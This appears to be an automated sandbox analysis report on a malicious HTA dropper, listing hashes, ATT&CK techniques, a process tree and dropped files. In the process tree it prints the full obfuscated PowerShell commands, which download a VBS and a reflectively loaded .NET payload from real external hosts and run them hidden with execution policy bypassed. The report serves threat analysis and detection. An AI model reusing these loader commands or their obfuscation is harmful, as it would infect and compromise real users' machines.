35717c891450767af251ec90a7c05ffd407d7b2d2897d96c176c51b5b8a156b5

General

Target

35717c891450767af251ec90a7c05ffd407d7b2d2897d96c176c51b5b8a156b5.hta
Size

178KB
MD5

05dcffe1d8e8e209a90b522192ad8000
SHA1

77c19b392d39bce4906b5c4e5f1ab0a0c9182dc7
SHA256

35717c891450767af251ec90a7c05ffd407d7b2d2897d96c176c51b5b8a156b5
SHA512

11eafd5f126bb4873ec7be1dc6fe7246f3de8324c413073bc914827695ed1db1bb9b6e870414c0d4aba990a6a817d6c029f7aa02e5061434dcdb965a378b5734
SSDEEP

48:4vahW5oZz7eWLB2ZfywyQhhY1ywyQbD6ngS5RJCS0d399Dd5nCYmIYZAjo3ueufc:4vCl17ZtQjtQhVFlfnnCO4AjovtQX5Q

Score

10^/10

defense_evasion discovery execution

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

ps1.dropper

https://1017.filemail.com/api/file/get?filekey=2Aa_bWo9Reu45t7BU1kVgsd9pT9pgSSlvStGrnTICfFhmTKj3LC6SQtIcOc_T35w&pk_vid=fd4f614bb209c62c1730945176a0904f

exe.dropper

https://1017.filemail.com/api/file/get?filekey=2Aa_bWo9Reu45t7BU1kVgsd9pT9pgSSlvStGrnTICfFhmTKj3LC6SQtIcOc_T35w&pk_vid=fd4f614bb209c62c1730945176a0904f

Signatures

Blocklisted process makes network request 3 IoCs

Processes:

PoWERsHeLl.EXepowershell.exe

flow pid process

3 2824 PoWERsHeLl.EXe
6 2544 powershell.exe
7 2544 powershell.exe
Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs
Run Powershell and hide display window.
execution

PowerShell
T1059.001

Processes:

powershell.exepowershell.exe

pid process

2544 powershell.exe
2560 powershell.exe
Evasion via Device Credential Deployment 2 IoCs
defense_evasion execution

Processes:

PoWERsHeLl.EXepowershell.exe

pid process

2824 PoWERsHeLl.EXe
2628 powershell.exe
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

flow	pid	process
3	2824	PoWERsHeLl.EXe
6	2544	powershell.exe
7	2544	powershell.exe

pid	process
2544	powershell.exe
2560	powershell.exe

pid	process
2824	PoWERsHeLl.EXe
2628	powershell.exe

System Location Discovery: System Language Discovery 1 TTPs 8 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

Processes:

mshta.exePoWERsHeLl.EXepowershell.execsc.execvtres.exeWScript.exepowershell.exepowershell.exe

description	ioc	process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	mshta.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	PoWERsHeLl.EXe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	csc.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cvtres.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	WScript.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe

Modifies Internet Explorer settings 1 TTPs 1 IoCs
adware spyware

Modify Registry
T1112

Processes:

mshta.exe

description ioc process

Key created \REGISTRY\USER\S-1-5-21-3533259084-2542256011-65585152-1000\Software\Microsoft\Internet Explorer\Main mshta.exe
Suspicious behavior: EnumeratesProcesses 4 IoCs

Processes:

PoWERsHeLl.EXepowershell.exepowershell.exepowershell.exe

pid process

2824 PoWERsHeLl.EXe
2628 powershell.exe
2560 powershell.exe
2544 powershell.exe

description	ioc	process
Key created	\REGISTRY\USER\S-1-5-21-3533259084-2542256011-65585152-1000\Software\Microsoft\Internet Explorer\Main	mshta.exe

pid	process
2824	PoWERsHeLl.EXe
2628	powershell.exe
2560	powershell.exe
2544	powershell.exe

Suspicious use of AdjustPrivilegeToken 4 IoCs

Processes:

PoWERsHeLl.EXepowershell.exepowershell.exepowershell.exe

description	pid	process
Token: SeDebugPrivilege	2824	PoWERsHeLl.EXe
Token: SeDebugPrivilege	2628	powershell.exe
Token: SeDebugPrivilege	2560	powershell.exe
Token: SeDebugPrivilege	2544	powershell.exe

Suspicious use of WriteProcessMemory 28 IoCs

Processes:

mshta.exePoWERsHeLl.EXecsc.exeWScript.exepowershell.exe

description	pid	process	target process
PID 2720 wrote to memory of 2824	2720	mshta.exe	PoWERsHeLl.EXe
PID 2720 wrote to memory of 2824	2720	mshta.exe	PoWERsHeLl.EXe
PID 2720 wrote to memory of 2824	2720	mshta.exe	PoWERsHeLl.EXe
PID 2720 wrote to memory of 2824	2720	mshta.exe	PoWERsHeLl.EXe
PID 2824 wrote to memory of 2628	2824	PoWERsHeLl.EXe	powershell.exe
PID 2824 wrote to memory of 2628	2824	PoWERsHeLl.EXe	powershell.exe
PID 2824 wrote to memory of 2628	2824	PoWERsHeLl.EXe	powershell.exe
PID 2824 wrote to memory of 2628	2824	PoWERsHeLl.EXe	powershell.exe
PID 2824 wrote to memory of 3016	2824	PoWERsHeLl.EXe	csc.exe
PID 2824 wrote to memory of 3016	2824	PoWERsHeLl.EXe	csc.exe
PID 2824 wrote to memory of 3016	2824	PoWERsHeLl.EXe	csc.exe
PID 2824 wrote to memory of 3016	2824	PoWERsHeLl.EXe	csc.exe
PID 3016 wrote to memory of 2024	3016	csc.exe	cvtres.exe
PID 3016 wrote to memory of 2024	3016	csc.exe	cvtres.exe
PID 3016 wrote to memory of 2024	3016	csc.exe	cvtres.exe
PID 3016 wrote to memory of 2024	3016	csc.exe	cvtres.exe
PID 2824 wrote to memory of 1700	2824	PoWERsHeLl.EXe	WScript.exe
PID 2824 wrote to memory of 1700	2824	PoWERsHeLl.EXe	WScript.exe
PID 2824 wrote to memory of 1700	2824	PoWERsHeLl.EXe	WScript.exe
PID 2824 wrote to memory of 1700	2824	PoWERsHeLl.EXe	WScript.exe
PID 1700 wrote to memory of 2560	1700	WScript.exe	powershell.exe
PID 1700 wrote to memory of 2560	1700	WScript.exe	powershell.exe
PID 1700 wrote to memory of 2560	1700	WScript.exe	powershell.exe
PID 1700 wrote to memory of 2560	1700	WScript.exe	powershell.exe
PID 2560 wrote to memory of 2544	2560	powershell.exe	powershell.exe
PID 2560 wrote to memory of 2544	2560	powershell.exe	powershell.exe
PID 2560 wrote to memory of 2544	2560	powershell.exe	powershell.exe
PID 2560 wrote to memory of 2544	2560	powershell.exe	powershell.exe

C:\Windows\SysWOW64\mshta.exe
C:\Windows\SysWOW64\mshta.exe "C:\Users\Admin\AppData\Local\Temp\35717c891450767af251ec90a7c05ffd407d7b2d2897d96c176c51b5b8a156b5.hta"
1⤵
- System Location Discovery: System Language Discovery
- Modifies Internet Explorer settings
- Suspicious use of WriteProcessMemory
PID:2720
- C:\Windows\SysWOW64\wiNdoWSPoWeRShElL\V1.0\PoWERsHeLl.EXe
  "C:\Windows\SysTEM32\wiNdoWSPoWeRShElL\V1.0\PoWERsHeLl.EXe" "pOWersheLL -Ex BYPaSs -nop -W 1 -c DeVIcECrEdenTiAldePlOYMEnT.exe ; INvokE-EXPressiON($(INvOkE-ExpressiON('[SystEM.tExt.encoDinG]'+[char]0X3A+[char]58+'UTF8.GetsTRIng([SyStEm.cOnVeRT]'+[ChaR]0X3A+[chaR]58+'frombasE64StRIng('+[chaR]34+'JFhvY0VSN21mYWMgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQWRELXRZcGUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbWVNYmVSZEVGaW5pVElvTiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJVcmxNT04iLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBkbkhyTG8sc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgamxXTWh0LHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEwsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFVEd1JCWENTLEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHFFS3ZxKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5BbUUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiZHpUayIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTmFNZVNQQUNFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgbHhzQnRTTVB2ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICRYb2NFUjdtZmFjOjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTA3LjE3Mi40NC4xNzgvNTMvc2VlbXliZXN0bmV0d29ya3doaWNoZ2l2ZWJlc3R0aGluZ3NlbnRpcmVsaWZld2l0aG1lLnRJRiIsIiRFTnY6QVBQREFUQVxzZWVteWJlc3RuZXR3b3Jrd2hpY2hnaXZlYmVzdHRoaW5nc2VudGlyZWxpZmV3aXRoLnZiUyIsMCwwKTtzVEFydC1zbEVFUCgzKTtJRVggICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJGVuVjpBUFBEQVRBXHNlZW15YmVzdG5ldHdvcmt3aGljaGdpdmViZXN0dGhpbmdzZW50aXJlbGlmZXdpdGgudmJTIg=='+[chaR]0X22+'))')))"
  2⤵
  - Blocklisted process makes network request
  - Evasion via Device Credential Deployment
  - System Location Discovery: System Language Discovery
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:2824
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Ex BYPaSs -nop -W 1 -c DeVIcECrEdenTiAldePlOYMEnT.exe
    3⤵
    - Evasion via Device Credential Deployment
    - System Location Discovery: System Language Discovery
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:2628
- - C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe
    "C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\bngpwxrd.cmdline"
    3⤵
    - System Location Discovery: System Language Discovery
    - Suspicious use of WriteProcessMemory
    PID:3016
  - - C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe
      C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES672D.tmp" "c:\Users\Admin\AppData\Local\Temp\CSC672C.tmp"
      4⤵
      System Location Discovery: System Language Discovery
      PID:2024
- - C:\Windows\SysWOW64\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\seemybestnetworkwhichgivebestthingsentirelifewith.vbS"
    3⤵
    - System Location Discovery: System Language Discovery
    - Suspicious use of WriteProcessMemory
    PID:1700
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCdzZVlpbWFnZVUnKydybCA9IFB1SWh0JysndHBzJysnOicrJy8vMTAxNy5maWxlbWFpbC5jb20vYXBpL2ZpbCcrJ2UvZ2V0P2ZpbGVrZXk9MkFhX2JXbzlSZXU0NXQ3QlUxa1Znc2Q5cFQ5cGdTU2x2U3QnKydHcm5USUNmRmhtVEtqM0xDNlNRdEljT2NfVDM1dyZwa192aWQ9ZmQ0ZjYxNGJiMjA5YzYyYzE3MzA5NDUxNzZhMDkwNGYgUHVJO3NlWXdlYkNsaWVudCA9IE5ldy1PYmplY3QgU3lzdGVtLk5ldC5XJysnZWJDbGllbnQ7c2VZaW1hZ2VCeXRlcyA9IHNlWXdlYkNsaWVuJysndC5Eb3dubG9hZERhdGEoc2VZaW1hZ2VVcmwpO3NlWWltYWcnKydlVGV4dCA9IFtTeXN0ZW0uVGV4dC5FbmNvZGluZ106OlVURjguR2V0U3RyaW5nKHNlWWltYWdlQnl0JysnZXMpO3NlWXN0YXJ0RmxhZyA9IFB1STw8QkFTRTY0XycrJ1NUQVJUPj5QdUk7c2VZZW5kRicrJ2xhZyA9IFB1SScrJzw8QkFTRTY0X0VORD4+UHVJO3NlWXN0YXJ0SW5kZXggPSBzZVlpbWFnZVRleHQuSW5kZXhPZignKydzZVlzdGFydEZsYWcpO3NlWWVuZCcrJ0luZGV4ID0gc2VZaW1hZ2VUZXh0LkluZGV4T2Yoc2VZZW5kRmxhZyk7cycrJ2VZc3RhcnRJbmRleCAtZ2UgMCAtYW5kIHNlWWVuZEluZGV4IC1ndCBzZVlzdGFydEluZGV4O3MnKydlWXN0YXJ0SW5kZXggKz0gc2VZc3RhcnRGbGFnLkxlbmd0aDtzZVliYXNlNjRMZW5ndGggPSBzZVllbmRJbmRleCAtIHNlWXN0YXJ0SW5kZXg7c2VZYmFzZTY0Q29tbWFuZCA9JysnIHNlJysnWWltYWcnKydlVCcrJ2V4dC5TdWJzdHJpbmcoc2VZc3RhcnRJbmRleCwnKycgc2VZYmFzZTY0TGVuZ3RoKTtzZVliYXNlNjRSZXZlcnNlZCA9IC1qb2luIChzZVliYXNlNjRDb21tYW5kJysnLlRvQ2hhckFycmF5KCkgMnBPIEZvckUnKydhY2gtT2JqZWN0IHsgc2VZXyB9KVstMS4uLShzZVknKydiYXNlNjRDb21tYW5kLkxlbmd0aCldO3NlWScrJ2NvbW1hbmRCeXRlcyA9IFtTeXN0ZW0uQycrJ29udmVydF06OkZyb21CYXNlNjRTdHJpbmcoJysnc2VZYmFzZTY0UmV2ZXJzZWQpO3NlWScrJ2xvYWRlZEFzc2VtYmx5ID0gW1N5c3RlbS5SZWZsJysnZWN0aW9uLkFzc2VtYmx5XScrJzo6TG9hZChzZVljb21tYW5kQnl0ZXMpO3NlWXZhaU1ldGhvZCA9IFsnKydkbmxpYi5JTy5Ib21lXS5HZXRNZXRob2QoUHVJVkFJUHVJKTtzZVl2YWlNZScrJ3Rob2QuSW52bycrJ2tlKHNlWW51bGwsIEAoUHVJdHh0LlRHUkZGUlcvMzUvODcxLjQ0LjI3MS43MDEvLycrJzpwdHRoUHVJLCBQdUlkZXNhdGl2YWRvUHVJLCBQdUlkJysnZXNhdGl2YWRvUHVJLCBQdScrJ0lkZXNhdGl2YWRvUHVJLCBQdUlhc3BuZXRfY29tcGlsJysnZXJQdUksIFB1SWRlc2F0aXZhZG9QdUksICcrJ1B1SWRlc2F0aXZhZG9QdUksUHVJZGVzYXRpdmFkbycrJ1B1SSxQdUlkZXNhdGl2YWRvUHVJLFB1SWRlc2F0aXZhZG9QdUksUHVJZGVzYXRpdmFkb1B1SSxQdUlkZXNhdGl2YWRvUHVJLFB1STFQdUksUHVJZGVzYXRpdmFkb1B1SSkpOycpLnJFUGxhQ0UoJ1B1SScsW1N0ckluR11bQ0hBUl0zOSkuckVQbGFDRSgnMnBPJywnfCcpLnJFUGxhQ0UoJ3NlWScsJyQnKXwgLiAoKGdWICcqTWRyKicpLm5BbUVbMywxMSwyXS1qT0lOJycp';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
      4⤵
      Command and Scripting Interpreter: PowerShell
      System Location Discovery: System Language Discovery
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      Suspicious use of WriteProcessMemory
      PID:2560
    - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "('seYimageU'+'rl = PuIht'+'tps'+':'+'//1017.filemail.com/api/fil'+'e/get?filekey=2Aa_bWo9Reu45t7BU1kVgsd9pT9pgSSlvSt'+'GrnTICfFhmTKj3LC6SQtIcOc_T35w&pk_vid=fd4f614bb209c62c1730945176a0904f PuI;seYwebClient = New-Object System.Net.W'+'ebClient;seYimageBytes = seYwebClien'+'t.DownloadData(seYimageUrl);seYimag'+'eText = [System.Text.Encoding]::UTF8.GetString(seYimageByt'+'es);seYstartFlag = PuI<<BASE64_'+'START>>PuI;seYendF'+'lag = PuI'+'<<BASE64_END>>PuI;seYstartIndex = seYimageText.IndexOf('+'seYstartFlag);seYend'+'Index = seYimageText.IndexOf(seYendFlag);s'+'eYstartIndex -ge 0 -and seYendIndex -gt seYstartIndex;s'+'eYstartIndex += seYstartFlag.Length;seYbase64Length = seYendIndex - seYstartIndex;seYbase64Command ='+' se'+'Yimag'+'eT'+'ext.Substring(seYstartIndex,'+' seYbase64Length);seYbase64Reversed = -join (seYbase64Command'+'.ToCharArray() 2pO ForE'+'ach-Object { seY_ })[-1..-(seY'+'base64Command.Length)];seY'+'commandBytes = [System.C'+'onvert]::FromBase64String('+'seYbase64Reversed);seY'+'loadedAssembly = [System.Refl'+'ection.Assembly]'+'::Load(seYcommandBytes);seYvaiMethod = ['+'dnlib.IO.Home].GetMethod(PuIVAIPuI);seYvaiMe'+'thod.Invo'+'ke(seYnull, @(PuItxt.TGRFFRW/35/871.44.271.701//'+':ptthPuI, PuIdesativadoPuI, PuId'+'esativadoPuI, Pu'+'IdesativadoPuI, PuIaspnet_compil'+'erPuI, PuIdesativadoPuI, '+'PuIdesativadoPuI,PuIdesativado'+'PuI,PuIdesativadoPuI,PuIdesativadoPuI,PuIdesativadoPuI,PuIdesativadoPuI,PuI1PuI,PuIdesativadoPuI));').rEPlaCE('PuI',[StrInG][CHAR]39).rEPlaCE('2pO','|').rEPlaCE('seY','$')| . ((gV '*Mdr*').nAmE[3,11,2]-jOIN'')"
        5⤵
        Blocklisted process makes network request
        Command and Scripting Interpreter: PowerShell
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:2544

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

1

T1059

PowerShell

1

T1059.001

Persistence

Privilege Escalation

Defense Evasion

Modify Registry

1

T1112

Credential Access

Discovery

System Information Discovery

1

T1082

System Location Discovery

1

T1614

System Language Discovery

1

T1614.001

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\RES672D.tmp

Filesize
1KB

MD5
be6b0ea64547b6f868e8909d098ba6c8

SHA1
b07cd5563ebcf2bcffd35c6813739221080b2f7b

SHA256
5f364638756ea015c8dfa12a82e5ed2cde2122a528ad037ab70b6fcd724eb62a

SHA512
6be2c5c0cd2a3b238850410ad6bb6b10658bfae9001ffd9f784996d982b2f78e9be6c4aa73982551644b33718de67e3d3210729910151f00be35549f0a68b229

Download Submit
C:\Users\Admin\AppData\Local\Temp\bngpwxrd.dll

Filesize
3KB

MD5
9da9960e7836ad31b2013f59df34ce89

SHA1
631fc607659b1c21c595dfe8e92327c0aec66e50

SHA256
9601e0b45e54b109bdaf9326b219fc7d4114c0e06c99618173a2e9e92643f9ad

SHA512
88e74f447fa529c8c7cd5108fa007e312552411f13e9c410e80ad6493c1ecdade5ff6d66aa9eddd15a0506f707b536da8f2d028db27862e6ab0760516c9a5df1

Download Submit
C:\Users\Admin\AppData\Local\Temp\bngpwxrd.pdb

Filesize
7KB

MD5
f023d77f4a1920a171223f70e487ac31

SHA1
dfb404a157558af9e60c694039d08ef0a86fedc3

SHA256
375af4ccd1e55507ecde0cd8e5d2fe69cfd870723a35c5f76560a16dc0052bae

SHA512
a48e3dab5ef11b30320a18bd1594de03cb08d8dc84f441d9ddaa711535f4e8d244776e2b5e6e98266aaee2c5403684c560e50e9c9724391e6b56c56244066040

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms

Filesize
7KB

MD5
5833f6775fe378ccd6521291745852fe

SHA1
f8a83a514b9b0d21f9b1fd9b0f547c7562ccaec0

SHA256
209e5fdb01d40e749cbec037c0a6404d68c11cde5bb8d092d2f0914c3d9f7645

SHA512
faed06de98ce7401d001bfd9e3d222711ac8f29cca97527326b30f0818f84c416ce07a9024075546e6f48aa33cc275f4f8d7f8da62d10a1f2659916a908a3995

Download Submit
C:\Users\Admin\AppData\Roaming\seemybestnetworkwhichgivebestthingsentirelifewith.vbS

Filesize
137KB

MD5
855d024750a1bc1bc078e60c05e506e3

SHA1
480c344ef4e060adb7ca7e159c815cb38ac87614

SHA256
560327e8e4c818547fe966c8704d97270986b7457d62a154219e81ed4afb4667

SHA512
64a68dd3c8750e7a90c95078dc1db87086c546212b56348e6d45f4444b5dd7e6725f3b5ddbc2c414d08a7df2fbf2eecd11b9ab414588ac7b66f57f70fbb85c94

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\CSC672C.tmp

Filesize
652B

MD5
f9a7259124a02bf8ac1011e8e75f6892

SHA1
2e4d80136e9776fca205cf1c1004ade01926aea7

SHA256
219a4003c585eae55df96cec6fba46f9151e04c7c1e16f58d87fa418b79778bf

SHA512
d3e9f58bfd1dc7ee40d749b1be22f8c3ac72c6a310dbff2bee7d29d8681b03b472e056cc4405d00da7e5bc22afba3ac896617f1448f21238bf894b522d2f7a04

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\bngpwxrd.0.cs

Filesize
472B

MD5
1a212b8a44924d84eeba108f2409b5e8

SHA1
b19066fab9c3329cd206958dacee65a08607586b

SHA256
977b687ccdcaea25b4afdd04dbac19bf12b31afad4ae226d7b7e5ed5cabcf073

SHA512
4d4bbada1880ce68ceeaff34a1d412350f715c0f5f741f7f47692549280dc92738881ce1fff7bbcd472610a63d99ded94ca713cc859b330a07d13df2313ea453

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\bngpwxrd.cmdline

Filesize
309B

MD5
5ab3d427a6ae2d5eb87bd2c09a1a7b00

SHA1
30309cf1aa4e35a03842c00d056f8564c2f25f55

SHA256
cd04de24a82e40a12dd306d492a6088bb0ba23401e7dd9538c622603769ed3af

SHA512
f3b6a84d7d10339568cc815927e983caa147c7e3d749a017ab7db407f9d2d45c2894723d35e3ff723e5807c9f23cf296b8eb94e65d122f216a4ae0242a644894

Download Submit

Analysis

Sharing

General

Malware Config

Extracted

Signatures

Processes

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads